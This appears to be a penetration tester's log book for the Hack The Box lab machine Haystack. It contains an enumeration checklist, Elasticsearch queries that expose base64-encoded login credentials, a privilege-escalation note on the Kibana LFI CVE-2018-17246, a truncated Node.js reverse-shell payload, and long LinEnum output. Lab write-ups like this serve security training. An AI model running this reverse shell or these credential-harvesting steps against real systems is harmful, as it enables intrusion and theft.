Log Book

10.10.10.115 - Haystack

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files

Software Versions

Potential Exploits

Enumeration

nmap -sC -sV -oA ./haystack 10.10.10.115
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 21:51 EDT
Nmap scan re

TCP

UDP

Web Services

Nikto

Dirb\DirBuster

WebDav

CMS

Other Services

SMB

SNMP

DB

Other

Elastic Search Running on 9200

http://10.10.10.115:9200 provides a JSON response letting us know that this is using Elastic Search.

name: "iQEYHgS"
cluster_name: "elasticsearch"
cluster_uuid: "pjrX7V_gSFmJY-DxP4tCQg"
version:
    number: "6.4.2"
    build_flavor: "default"
    build_type: "rpm"
    build_hash: "04711c2"
    build_date: "2018-09-26T13:34:09.098244Z"
    build_snapshot: false
    lucene_version: "7.4.0"
    minimum_wire_compatibility_version: "5.6.0"
    minimum_index_compatibility_version: "5.0.0"
tagline: "You Know, for Search"

http://10.10.10.115:9200/_cat/indices?v

health status index   uuid                   pri rep docs.count docs.deleted store.size pri.store.size
green  open   .kibana 6tjAYZrgQ5CwwR0g6VOoRg   1   0          1            0        4kb            4kb
yellow open   quotes  ZG2D1IqkQNiNZmi2HRImnQ   5   1        253            0    262.7kb        262.7kb
yellow open   bank    eSVpNfCfREyYoVigNWcrMw   5   1       1000            0    483.2kb        483.2kb

http://10.10.10.115:9200/quotes/_search?size=253

cat output.txt | jq '.hits.hits | .[] | ._source.quote' | grep ':'

Lines 25 and 29

"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "
"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="

"I have to save the password for the machine: user: security "
"This key cannot be lost, I keep it here: pass: spanish.is.key"

Exploitation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:
Discovery of Vulnerability
Exploit Code Used
Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Post Exploitation

Operating System
Architecture
Domain
Installed Updates

Script Results

Network

IPConfig\IFConfig
Network Processes
ARP
DNS
Route

Users & Groups

Users
Groups

Installed Applications

Installed Applications

Scheduled Jobs

Scheduled Tasks

Priv Escalation

Service Exploited: Kibana
Vulnerability Type: LFI
Exploit POC: https://github.com/mpgn/CVE-2018-17246
Description: Malicious JS for Privesc from Security to Kibana user
Discovery of Vulnerability
Listening port 5601 in LinEnum.sh
Exploit Code Used
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/bash", []);
    var client = new net.Socket();
    client.connect(9999,

Goodies

Running Processes

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Enabled

Scan started at: Fri Apr 3 11:36:27 -03 2020

### SYSTEM ##############################################
[-] Kernel information:
Linux haystack 3.10.0-957.1.3.el7.x86_64 #1 SMP Thu Nov 29 14:49:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 3.10.0-957.1.3.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Thu Nov 29 14:49:43 UTC 2018

[-] Specific release information:
CentOS Linux release 7.6.1810 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.6.1810 (Core)
CentOS Linux release 7.6.1810 (Core)

[-] Hostname:
haystack

### USER/GROUP ##########################################
[-] Current user/group info:
uid=1000(security) gid=1000(security) groups=1000(security) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[-] Users that have previously logged onto the system:
Username Port  From        Latest
root     tty1              Tue Aug 27 04:34:59 -0400 2019
security pts/0 10.10.14.28 Fri Apr 3 11:11:02 -0300 2020

[-] Who else is logged on:
11:36:27 up 12:47, 1 user, load average: 0.03, 0.04, 0.05
USER     TTY   FROM        LOGIN@ IDLE  JCPU  PCPU  WHAT
security pts/0 10.10.14.28 11:11  3.00s 0.04s 0.00s /bin/bash ./linenum.sh -t

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=1000(security) gid=1000(security) groups=1000(security)
uid=997(elasticsearch) gid=995(elasticsearch) groups=995(elasticsearch)
uid=996(logstash) gid=994(logstash) groups=994(logstash)
uid=995(nginx) gid=993(nginx) groups=993(nginx)
uid=994(kibana) gid=992(kibana) groups=992(kibana)

[-] It looks like we have some admin users:
uid=3(adm) gid=4(adm) groups=4(adm)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
security:x:1000:1000:security:/home/security:/bin/bash
elasticsearch:x:997:995:elasticsearch user:/nonexistent:/sbin/nologin
logstash:x:996:994:logstash:/usr/share/logstash:/sbin/nologin
nginx:x:995:993:Nginx web server:/var/lib/nginx:/sbin/nologin
kibana:x:994:992:kibana service user:/home/kibana:/sbin/nologin

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 0
drwxr-xr-x. 3 root root 22 Nov 28 2018 .
dr-xr-xr-x. 17 root root 224 Nov 28 2018 ..
drwx------. 2 security security 115 Apr 3 11:36 security

[-] Files owned by our user:
-rw-rw----. 1 security mail 0 Nov 28 2018 /var/spool/mail/security
-rw-rw-r--. 1 security security 4968 Apr 3 11:36 /tmp/output.txt
-rwsrwsrwt. 1 security security 46631 Apr 3 11:36 /tmp/linenum.sh
-rw-r--r--. 1 security security 18 Apr 10 2018 /home/security/.bash_logout
-rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile
-rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc
-rw-r--r--. 1 security security 33 Feb 6 2019 /home/security/user.txt
-rw-------. 1 security security 668 Apr 3 11:36 /home/security/.viminfo

[-] Hidden files:
-rw-r--r--. 1 root root 166 Apr 20 2018 /boot/.vmlinuz-3.10.0-862.el7.x86_64.hmac
-rw-r--r--. 1 root root 171 Sep 26 2018 /boot/.vmlinuz-3.10.0-862.14.4.el7.x86_64.hmac
-rw-r--r--. 1 root root 170 Nov 29 2018 /boot/.vmlinuz-3.10.0-957.1.3.el7.x86_64.hmac
-rw-r--r--. 1 root root 0 Apr 2 22:49 /run/initramfs/.need_shutdown
-rw-r--r--. 1 root root 18 Oct 30 2018 /etc/skel/.bash_logout
-rw-r--r--. 1 root root 193 Oct 30 2018 /etc/skel/.bash_profile
-rw-r--r--. 1 root root 231 Oct 30 2018 /etc/skel/.bashrc
-rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile
-rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc
-rw-------. 1 security security 668 Apr 3 11:36 /home/security/.viminfo

[-] World-readable files within /home:
-rw-r--r--. 1 security security 18 Apr 10 2018 /home/security/.bash_logout
-rw-r--r--. 1 security security 193 Apr 10 2018 /home/security/.bash_profile
-rw-r--r--. 1 security security 231 Apr 10 2018 /home/security/.bashrc
-rw-r--r--. 1 security security 33 Feb 6 2019 /home/security/user.txt

[-] Home directory contents:
total 20K
drwx------. 2 security security 115 Apr 3 11:36 .
drwxr-xr-x. 3 root root 22 Nov 28 2018 ..
lrwxrwxrwx. 1 root root 9 Jan 25 2019 .bash_history -> /dev/null
-rw-r--r--. 1 security security 18 Apr 10 2018 .bash_logout
-rw-r--r--. 1 security security 193 Apr 10 2018 .bash_profile
-rw-r--r--. 1 security security 231 Apr 10 2018 .bashrc
-rw-r--r--. 1 security security 33 Feb 6 2019 user.txt
-rw-------. 1 security security 668 Apr 3 11:36 .viminfo

### ENVIRONMENTAL #######################################
[-] Environment information:
XDG_SESSION_ID=14
HOSTNAME=haystack
SELINUX_ROLE_REQUESTED=
SHELL=/bin/bash
TERM=xterm-256color
HISTSIZE=1000
SSH_CLIENT=10.10.14.28 42226 22
SELINUX_USE_CURRENT_RANGE=
SSH_TTY=/dev/pts/0
USER=security
PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/security/.local/bin:/home/security/bin
MAIL=/var/spool/mail/security
PWD=/tmp
LANG=en_US.utf8
SELINUX_LEVEL_REQUESTED=
HISTCONTROL=ignoredups
HOME=/home/security
SHLVL=2
LOGNAME=security
SSH_CONNECTION=10.10.14.28 42226 10.10.10.115 22
LESSOPEN=||/usr/bin/lesspipe.sh %s
XDG_RUNTIME_DIR=/run/user/1000
_=/usr/bin/env

[-] SELinux seems to be present:
SELinux status: enabled
SELinuxfs mount: /sys/fs/selinux
SELinux root directory: /etc/selinux
Loaded policy name: targeted
Current mode: permissive
Mode from config file: permissive
Policy MLS status: enabled
Policy deny_unknown status: allowed
Max kernel policy version: 31

[-] Path information:
/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/security/.local/bin:/home/security/bin
dr-xr-xr-x. 2 root root 24576 Aug 27 2019 /usr/bin
drwxr-xr-x. 2 root root 6 Apr 11 2018 /usr/local/bin
drwxr-xr-x. 2 root root 6 Apr 11 2018 /usr/local/sbin
dr-xr-xr-x. 2 root root 12288 Aug 27 2019 /usr/sbin

[-] Available shells:
/bin/sh
/bin/bash
/usr/bin/sh
/usr/bin/bash

[-] Current umask value:
0002
u=rwx,g=rwx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 077

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-------. 1 root root 0 Nov 20 2018 /etc/cron.deny
-rw-r--r--. 1 root root 451 Jun 9 2014 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x. 2 root root 21 Dec 11 2018 .
drwxr-xr-x. 85 root root 8192 Aug 27 2019 ..
-rw-r--r--. 1 root root 128 Nov 20 2018 0hourly

/etc/cron.daily:
total 20
drwxr-xr-x. 2 root root 42 Dec 11 2018 .
drwxr-xr-x. 85 root root 8192 Aug 27 2019 ..
-rwx------. 1 root root 219 Oct 30 2018 logrotate
-rwxr-xr-x. 1 root root 618 Oct 30 2018 man-db.cron

/etc/cron.hourly:
total 16
drwxr-xr-x. 2 root root 22 Dec 11 2018 .
drwxr-xr-x. 85 root root 8192 Aug 27 2019 ..
-rwxr-xr-x. 1 root root 392 Nov 20 2018 0anacron

/etc/cron.monthly:
total 12
drwxr-xr-x. 2 root root 6 Jun 9 2014 .
drwxr-xr-x. 85 root root 8192 Aug 27 2019 ..

/etc/cron.weekly:
total 12
drwxr-xr-x. 2 root root 6 Jun 9 2014 .
drwxr-xr-x. 85 root root 8192 Aug 27 2019 ..

[-] Crontab contents:
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

[-] Anacron jobs and associated file permissions:
-rw-------. 1 root root 541 Nov 20 2018 /etc/anacrontab

[-] When were jobs last executed (/var/spool/anacron contents):
total 12
drwxr-xr-x. 2 root root 63 Nov 20 2018 .
drwxr-xr-x. 8 root root 87 Nov 28 2018 ..
-rw-------. 1 root root 9 Apr 3 03:08 cron.daily
-rw-------. 1 root root 9 Apr 3 03:21 cron.monthly
-rw-------. 1 root root 9 Apr 3 03:01 cron.weekly

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2020-04-03 23:04:24 -03 11h left Thu 2020-04-02 23:04:24 -03 12h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
n/a n/a n/a n/a systemd-readahead-done.timer systemd-readahead-done.service

2 timers listed.

### NETWORKING ##########################################
[-] Network and IP info:
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:50:56:b9:3a:7b brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.115/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:3a7b/64 scope global mngtmpaddr dynamic
       valid_lft 86363sec preferred_lft 14363sec
    inet6 fe80::250:56ff:feb9:3a7b/64 scope link
       valid_lft forever preferred_lft forever

[-] ARP history:
169.254.169.254 dev ens33 FAILED
10.10.10.2 dev ens33 lladdr 00:50:56:b9:f9:ab REACHABLE
fe80::250:56ff:feb9:f9ab dev ens33 lladdr 00:50:56:b9:f9:ab router STALE

[-] Nameserver(s):
nameserver 192.168.2.2

[-] Default route:
default via 10.10.10.2 dev ens33

[-] Listening TCP:
State  Recv-Q Send-Q Local Address:Port     Peer Address:Port
LISTEN 0      128    *:80                   *:*
LISTEN 0      128    *:9200                 *:*
LISTEN 0      128    *:22                   *:*
LISTEN 0      128    127.0.0.1:5601         *:*
LISTEN 0      128    ::ffff:127.0.0.1:9000  :::*
LISTEN 0      128    :::80                  :::*
LISTEN 0      128    ::ffff:127.0.0.1:9300  :::*
LISTEN 0      128    :::22                  :::*
LISTEN 0      50     ::ffff:127.0.0.1:9600  :::*

[-] Listening UDP:
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
UNCONN 0      0      127.0.0.1:323      *:*
UNCONN 0      0      ::1:323            :::*

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 128028 6572 ? Ss Apr02 0:03 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 2 0.0 0.0 0 0 ? S Apr02 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Apr02 0:01 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Apr02 0:00 [kworker/0:0H]
root 6 0.0 0.0 0 0 ? S Apr02 0:01 [kworker/u256:0]
root 7 0.0 0.0 0 0 ? S Apr02 0:00 [migration/0]
root 8 0.0 0.0 0 0 ? S Apr02 0:00 [rcu_bh]
root 9 0.0 0.0 0 0 ? R Apr02 0:07 [rcu_sched]
root 10 0.0 0.0 0 0 ? S< Apr02 0:00 [lru-add-drain]
root 11 0.0 0.0 0 0 ? S Apr02 0:00 [watchdog/0]
root 13 0.0 0.0 0 0 ? S Apr02 0:00 [kdevtmpfs]
root 14 0.0 0.0 0 0 ? S< Apr02 0:00 [netns]
root 15 0.0 0.0 0 0 ? S Apr02 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S< Apr02 0:00 [writeback]
root 17 0.0 0.0 0 0 ? S< Apr02 0:00 [kintegrityd]
root 18 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 19 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 20 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 21 0.0 0.0 0 0 ? S< Apr02 0:00 [kblockd]
root 22 0.0 0.0 0 0 ? S< Apr02 0:00 [md]
root 23 0.0 0.0 0 0 ? S< Apr02 0:00 [edac-poller]
root 24 0.0 0.0 0 0 ? S< Apr02 0:00 [watchdogd]
root 30 0.0 0.0 0 0 ? S Apr02 0:00 [kswapd0]
root 31 0.0 0.0 0 0 ? SN Apr02 0:00 [ksmd]
root 32 0.0 0.0 0 0 ? SN Apr02 0:00 [khugepaged]
root 33 0.0 0.0 0 0 ? S< Apr02 0:00 [crypto]
root 41 0.0 0.0 0 0 ? S< Apr02 0:00 [kthrotld]
root 43 0.0 0.0 0 0 ? S< Apr02 0:00 [kmpath_rdacd]
root 44 0.0 0.0 0 0 ? S< Apr02 0:00 [kaluad]
root 45 0.0 0.0 0 0 ? S< Apr02 0:00 [kpsmoused]
root 47 0.0 0.0 0 0 ? S< Apr02 0:00 [ipv6_addrconf]
root 60 0.0 0.0 0 0 ? S< Apr02 0:00 [deferwq]
root 91 0.0 0.0 0 0 ? S Apr02 0:00 [kauditd]
root 1627 0.0 0.0 0 0 ? S< Apr02 0:00 [ata_sff]
root 1632 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_0]
root 1635 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_0]
root 1638 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_1]
root 1640 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_1]
root 1642 0.0 0.0 0 0 ? R Apr02 0:00 [kworker/u256:2]
root 1643 0.0 0.0 0 0 ? S< Apr02 0:00 [mpt_poll_0]
root 1644 0.0 0.0 0 0 ? S< Apr02 0:00 [mpt/0]
root 2622 0.0 0.0 0 0 ? S< Apr02 0:00 [nfit]
root 2692 0.0 0.0 0 0 ? S Apr02 0:00 [scsi_eh_2]
root 2700 0.0 0.0 0 0 ? S< Apr02 0:00 [scsi_tmf_2]
root 2762 0.0 0.0 0 0 ? S< Apr02 0:00 [ttm_swap]
root 2769 0.0 0.0 0 0 ? S Apr02 0:00 [irq/16-vmwgfx]
root 2947 0.0 0.0 0 0 ? S< Apr02 0:00 [kdmflush]
root 2948 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 2961 0.0 0.0 0 0 ? S< Apr02 0:00 [kdmflush]
root 2964 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 2981 0.0 0.0 0 0 ? S< Apr02 0:00 [bioset]
root 2986 0.0 0.0 0 0 ? S< Apr02 0:00 [xfsalloc]
root 2991 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs_mru_cache]
root 2994 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-buf/dm-0]
root 2997 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-data/dm-0]
root 3000 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-conv/dm-0]
root 3001 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-cil/dm-0]
root 3002 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-reclaim/dm-]
root 3003 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-log/dm-0]
root 3004 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-eofblocks/d]
root 3005 0.0 0.0 0 0 ? S Apr02 0:16 [xfsaild/dm-0]
root 3006 0.0 0.0 0 0 ? S< Apr02 0:00 [kworker/0:1H]
root 3072 0.0 0.1 40216 3968 ? Ss Apr02 0:00 /usr/lib/systemd/systemd-journald
root 3088 0.0 0.1 127348 4132 ? Ss Apr02 0:00 /usr/sbin/lvmetad -f
root 3101 0.0 0.1 48076 5572 ? Ss Apr02 0:02 /usr/lib/systemd/systemd-udevd
root 4866 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-buf/sda1]
root 4868 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-data/sda1]
root 4869 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-conv/sda1]
root 4873 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-cil/sda1]
root 4880 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-reclaim/sda]
root 4888 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-log/sda1]
root 4889 0.0 0.0 0 0 ? S< Apr02 0:00 [xfs-eofblocks/s]
root 4894 0.0 0.0 0 0 ? S Apr02 0:00 [xfsaild/sda1]
root 6137 0.0 0.0 62044 1084 ? S<sl Apr02 0:00 /sbin/auditd
root 6366 0.0 0.0 26376 1752 ? Ss Apr02 0:00 /usr/lib/systemd/systemd-logind
root 6367 0.8 13.1 2719488 508092 ? SNsl Apr02 6:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete-9.1.13.0.jar:/usr/share/logstash/logstash-core/lib/jars/jsr305-1.3.9.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-api-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-core-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/log4j-slf4j-impl-2.9.1.jar:/usr/share/logstash/logstash-core/lib/jars/logstash-core.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.commands-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.contenttype-3.4.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.expressions-3.4.300.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.filesystem-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.jobs-3.5.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.resources-3.7.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.core.runtime-3.7.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.app-1.3.100.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.common-3.6.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.preferences-3.4.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.equinox.registry-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.jdt.core-3.10.0.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.osgi-3.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/org.eclipse.text-3.5.101.jar:/usr/share/logstash/logstash-core/lib/jars/slf4j-api-1.7.25.jar org.logstash.Logstash --path.settings /etc/logstash
kibana 6370 0.3 5.2 1345080 204540 ? Ssl Apr02 3:03 /usr/share/kibana/bin/../node/bin/node --no-warnings /usr/share/kibana/bin/../src/cli -c /etc/kibana/kibana.yml
polkitd 6371 0.0 0.3 613020 14000 ? Ssl Apr02 0:00 /usr/lib/polkit-1/polkitd --no-debug
dbus 6377 0.0 0.0 66500 2676 ? Ssl Apr02 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
chrony 6384 0.0 0.0 117784 1652 ? S Apr02 0:00 /usr/sbin/chronyd
root 6417 0.0 0.0 126284 1692 ? Ss Apr02 0:00 /usr/sbin/crond -n
root 6474 0.0 0.7 358584 29448 ? Ssl Apr02 0:01 /usr/bin/python -Es /usr/sbin/firewalld --nofork --nopid
root 6475 0.0 0.0 110092 864 tty1 Ss+ Apr02 0:00 /sbin/agetty --noclear tty1 linux
root 6540 0.0 0.2 476092 8372 ? Ssl Apr02 0:01 /usr/sbin/NetworkManager --no-daemon
root 6738 0.1 0.2 272092 8516 ? Sl Apr02 0:47 /usr/sbin/vmtoolsd
root 6772 0.0 0.1 59468 6036 ? S Apr02 0:00 /usr/lib/vmware-vgauth/VGAuthService -s
root 7211 0.0 0.4 573828 17288 ? Ssl Apr02 0:05 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 7212 0.0 0.1 112756 4356 ? Ss Apr02 0:00 /usr/sbin/sshd -D
root 7214 0.0 0.1 222748 7568 ? Ssl Apr02 0:02 /usr/sbin/rsyslogd -n
elastic+ 7216 0.9 34.9 3322412 1348764 ? Ssl Apr02 7:07 /bin/java -Xms1g -Xmx1g -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -XX:+AlwaysPreTouch -Xss1m -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djna.nosys=true -XX:-OmitStackTraceInFastThrow -Dio.netty.noUnsafe=true -Dio.netty.noKeySetOptimization=true -Dio.netty.recycler.maxCapacityPerThread=0 -Dlog4j.shutdownHookEnabled=false -Dlog4j2.disable.jmx=true -Djava.io.tmpdir=/tmp/elasticsearch.mJXMYZll -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/lib/elasticsearch -XX:ErrorFile=/var/log/elasticsearch/hs_err_pid%p.log -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintTenuringDistribution -XX:+PrintGCApplicationStoppedTime -Xloggc:/var/log/elasticsearch/gc.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=32 -XX:GCLogFileSize=64m -

-rwxr-xr-x. 1 root root 219K Nov 2 2018 /usr/bin/dbus-daemon
0 lrwxrwxrwx. 1 root root 7 Dec 11 2018 /usr/bin/python -> python2
0 lrwxrwxrwx. 1 root root 9 Dec 11 2018 /usr/bin/python2 -> python2.7
